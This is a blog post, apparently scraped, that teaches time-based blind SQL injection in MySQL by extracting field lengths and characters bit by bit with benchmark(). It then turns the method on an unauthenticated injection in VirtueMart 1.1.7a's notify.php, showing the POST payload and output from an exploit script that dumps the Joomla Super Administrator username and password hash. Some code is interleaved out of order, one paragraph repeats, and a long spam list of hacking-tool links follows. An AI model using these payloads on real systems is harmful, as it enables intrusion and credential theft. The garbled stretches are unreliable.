Now that we have the basic idea out of the way we can move onto how this is normally done and then onto the target of this post. Normally a sensitive item in the database is targeted, such as a username and password. Once we know where this item lives in the database we would first determine the length of the item, so for example an administrator's username. All examples below are being executed on an mysql database hosting a Joomla install. Since the example database is a Joomla web application database, we would want to execute a query like the following on the database:
select length(username) from jos_users where usertype = 'Super Administrator';Because we can't return the value back directly we have to make a query like the following iteratively:
select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
select if(length(username)=2,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
We would keep incrementing the number we compare the length of the username to until the database paused (benchmark function hit). In this case it would be 5 requests until our statement was true and the benchmark was hit.
Examples showing time difference:
mysql> select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.00 sec)
mysql> select if(length(username)=5,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.85 sec)
Now in the instance of the password, the field is 65 characters long, so it would require 65 requests to discover the length of the password using this same technique. This is where we get to the topic of the post, we can actually determine the length of any field in only 8 requests (up to 255). By querying the value bit by bit we can determine if a bit is set or not by using a boolean statement again. We will use the following to test each bit of our value:
Start with checking the most significant bit and continue to the least significant bit, value is '65':
value & 128
01000001
10000000
-----------
00000000
value & 64
01000001
01000000
-----------
01000000
value & 32
01000001
00100000
-----------
00000000
value & 16
01000001
00010000
--------
00000000
value & 8
01000001
00001000
--------
00000000
value & 4
01000001
00000100
-----------
00000000
value & 2
01000001
00000010
-----------
00000000
value & 1
01000001
00000001
-----------
00000001
The items that have been highlighted in red identify where we would have a bit set (1), this is also the what we will use to satisfy our boolean statement to identify a 'true' statement. The following example shows the previous example being executed on the database, we identify set bits by running a benchmark to make the database pause:
mysql> select if(length(password) & 128,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 64,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (7.91 sec)
mysql> select if(length(password) & 32,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 16,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 8,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 4,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 2,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 1,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (8.74 sec)
As you can see, whenever we satisfy the boolean statement we get a delay in our response, we can mark that bit as being set (1) and all others as being unset (0). This gives us 01000001 or 65. Now that we have figured out how long our target value is we can move onto extracting its value from the database. Normally this is done using a substring function to move through the value character by character. At each offset we would test its value against a list of characters until our boolean statement was satisfied, indicating we have found the correct character. Example of this:
select if(substring(password,1,1)='a',benchmark(50000000,md5('cc')),0) as query from jos_users;This works but depending on how your character set that you are searching with is setup can effect how many requests it will take to find a character, especially when considering case sensitive values. Consider the following password hash:
da798ac6e482b14021625d3fad853337skxuqNW1GkeWWldHw6j1bFDHR4Av5SfLIf you searched for this string a character at a time using the following character scheme [0-9A-Za-z] it would take about 1400 requests. If we apply our previous method of extracting a bit at a time we will only make 520 requests (65*8). The following example shows the extraction of the first character in this password:
mysql> select if(ord(substring(password,1,1)) & 128,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 64,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.91 sec)
mysql> select if(ord(substring(password,1,1)) & 32,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.93 sec)
mysql> select if(ord(substring(password,1,1)) & 16,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 8,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 4,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.91 sec)
mysql> select if(ord(substring(password,1,1)) & 2,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 1,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
Again I have highlighted the requests where the bit was set in red. According to these queries the value is 01100100 (100) which is equal to 'd'. The offset of the substring would be incremented and the next character would be found until we reached the length of the value that we found earlier.
Now that the brief lesson is over we can move on to actually exploiting something using this technique. Our target is Virtuemart. Virtuemart is a free shopping cart module for the Joomla platform. Awhile back I had found an unauthenticated sql injection vulnerability in version 1.1.7a. This issue was fixed promptly by the vendor (...I was amazed) in version 1.1.8. The offending code was located in "$JOOMLA/administrator/components/com_virtuemart/notify.php" :
Related newsNow that the brief lesson is over we can move on to actually exploiting something using this technique. Our target is Virtuemart. Virtuemart is a free shopping cart module for the Joomla platform. Awhile back I had found an unauthenticated sql injection vulnerability in version 1.1.7a. This issue was fixed promptly by the vendor (...I was amazed) in version 1.1.8. The offending code was located in "$JOOMLA/administrator/components/com_virtuemart/notify.php" :
if($order_id === "" || $order_id === null)The $txn_id variable is set by a post variable of the same name. The following example will cause the web server to delay before returning:
{
$vmLogger->debug("Could not find order ID via invoice");
$vmLogger->debug("Trying to get via TransactionID: ".$txn_id);
$qv = "SELECT * FROM `#__{vm}_order_payment` WHERE `order_payment_trans_id` = '".$txn_id."'";
$db->query($qv);
print($qv);
if( !$db->next_record()) {
$vmLogger->err("Error: No Records Found.");
}
POST /administrator/components/com_virtuemart/notify.php HTTP/1.0Now that an insertion point has been identified we can automate the extraction of the "Super Administrator" account from the system:
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
invoice=1&txn_id=1' or benchmark(50000000,md5('cc'));#
python vm_own.py "http://192.168.18.131/administrator/components/com_virtuemart/notify.php"
[*] Getting string length
[+] username length is:5
[+] username:admin
[*] Getting string length
[+] password length is:65
[+] password:da798ac6e482b14021625d3fad853337:skxuqNW1GkeWWldHw6j1bFDHR4Av5SfLThe "vm_own.py" script can be downloaded here.
- Hacker Hardware Tools
- Hacking Tools Kit
- Pentest Tools Github
- Tools 4 Hack
- Pentest Tools Alternative
- Hacker Search Tools
- Easy Hack Tools
- World No 1 Hacker Software
- Pentest Tools Port Scanner
- Hacking Tools For Windows Free Download
- Pentest Tools Kali Linux
- Hacking Tools 2019
- Easy Hack Tools
- Pentest Tools For Ubuntu
- Hacker Tools Software
- Hack Tools
- Hackrf Tools
- What Are Hacking Tools
- Pentest Tools Alternative
- Free Pentest Tools For Windows
- Pentest Tools Find Subdomains
- Termux Hacking Tools 2019
- Hacking Tools 2020
- Hacker Tools 2019
- Hacker Security Tools
- Hacking Tools For Windows
- Hacker Tools For Mac
- Hacking Tools And Software
- Pentest Tools Url Fuzzer
- Hackrf Tools
- Hacking Tools For Games
- Underground Hacker Sites
- Android Hack Tools Github
- Hack Tools Github
- Hack Tool Apk
- Best Hacking Tools 2020
- Hacking Tools Name
- Hacking Tools For Beginners
- Easy Hack Tools
- Pentest Tools Website Vulnerability
- Hacker Tools Free Download
- Pentest Tools Windows
- Growth Hacker Tools
- New Hack Tools
- Pentest Tools Tcp Port Scanner
- Best Hacking Tools 2019
- Pentest Tools
- Hacker Tools Apk Download
- Hacker Search Tools
- Hacker Hardware Tools
- Hack And Tools
- Install Pentest Tools Ubuntu
- Pentest Tools Subdomain
- Underground Hacker Sites
- Underground Hacker Sites
- Hacking Tools For Windows 7
- Hacking Tools Hardware
- Hacking Tools Online
- Hacking Apps
- How To Install Pentest Tools In Ubuntu
- Hacking Tools Windows
- Hackrf Tools
- Hack And Tools
- Hacking Tools Usb
- Pentest Tools For Windows
- Hacker Tools For Mac
- Nsa Hacker Tools
- Best Hacking Tools 2019
- Hackrf Tools
- Hacker Tools Hardware
- Hacking Tools Software
- Pentest Tools Android
- Beginner Hacker Tools
- Hacking Tools Pc
- Physical Pentest Tools
- Hack Tools For Pc
- Github Hacking Tools
- Growth Hacker Tools
- Hacking Tools Online
- Black Hat Hacker Tools
- Free Pentest Tools For Windows
- Install Pentest Tools Ubuntu
- Hacking Tools
- Hacker Tools Mac
- Hackrf Tools
- Pentest Tools Open Source
- Pentest Recon Tools
- Hack Tools For Pc
- Best Hacking Tools 2019
- Hacker Search Tools
- Tools 4 Hack
- Hacking Tools For Games
- Ethical Hacker Tools
- Hacking App
- Hacking Tools Usb
- Pentest Tools For Ubuntu
- Hacker Tools List
- Hack Tool Apk No Root
- Hack Tools Github
- Hacking Tools For Kali Linux
- Pentest Tools For Android
- Hacking Tools
- Hack Tools For Games
- Pentest Tools Url Fuzzer
- Pentest Tools Find Subdomains
- Hacker Tools Linux
- Install Pentest Tools Ubuntu
- Pentest Box Tools Download
- How To Make Hacking Tools
- Hacker Tools 2019
- Pentest Tools Free
- Hackrf Tools
- Pentest Tools Apk
- New Hack Tools
- New Hacker Tools
- Hack Tools Pc
- Hackers Toolbox
- Pentest Tools Url Fuzzer
- Nsa Hack Tools
- Hacker Tools List
- Hack Rom Tools
- How To Install Pentest Tools In Ubuntu
- Pentest Tools Url Fuzzer
- Hack Tools For Windows
- Beginner Hacker Tools
- Hack Tools 2019
- Hack Website Online Tool
- Hacker Tools For Mac
- Free Pentest Tools For Windows
- Best Hacking Tools 2020
- Tools 4 Hack
- Hacking Tools Windows
- Pentest Tools For Ubuntu
- Pentest Tools For Mac
- Hacker Tools For Ios
- Hack Tools For Mac
- Hacker Tools Free Download
- Hack Tools 2019
- Hack Tools For Games
- New Hack Tools
- Hacks And Tools
- Hacking Tools And Software
- Pentest Tools Apk
- Hacks And Tools
- New Hacker Tools
- Pentest Tools For Ubuntu
- Hacking Tools Usb
- Hacking Tools For Mac
- Pentest Tools Website Vulnerability
- Hacker Tools For Pc
- Hack Tools Download
- Pentest Tools Online
- Hacking Tools Pc
- Pentest Box Tools Download
- Hacking Tools 2020
- Pentest Tools
- Pentest Tools Alternative
- Hack Tools 2019
- Pentest Tools For Ubuntu
- Hacker Hardware Tools
- Tools For Hacker
- Best Hacking Tools 2019
- Hacking Tools Software
- Hacking Tools Pc
- Hack Website Online Tool
- Hack Tools Online
- Hack Tools Mac
- Hacker Techniques Tools And Incident Handling
- Best Pentesting Tools 2018
No comments:
Post a Comment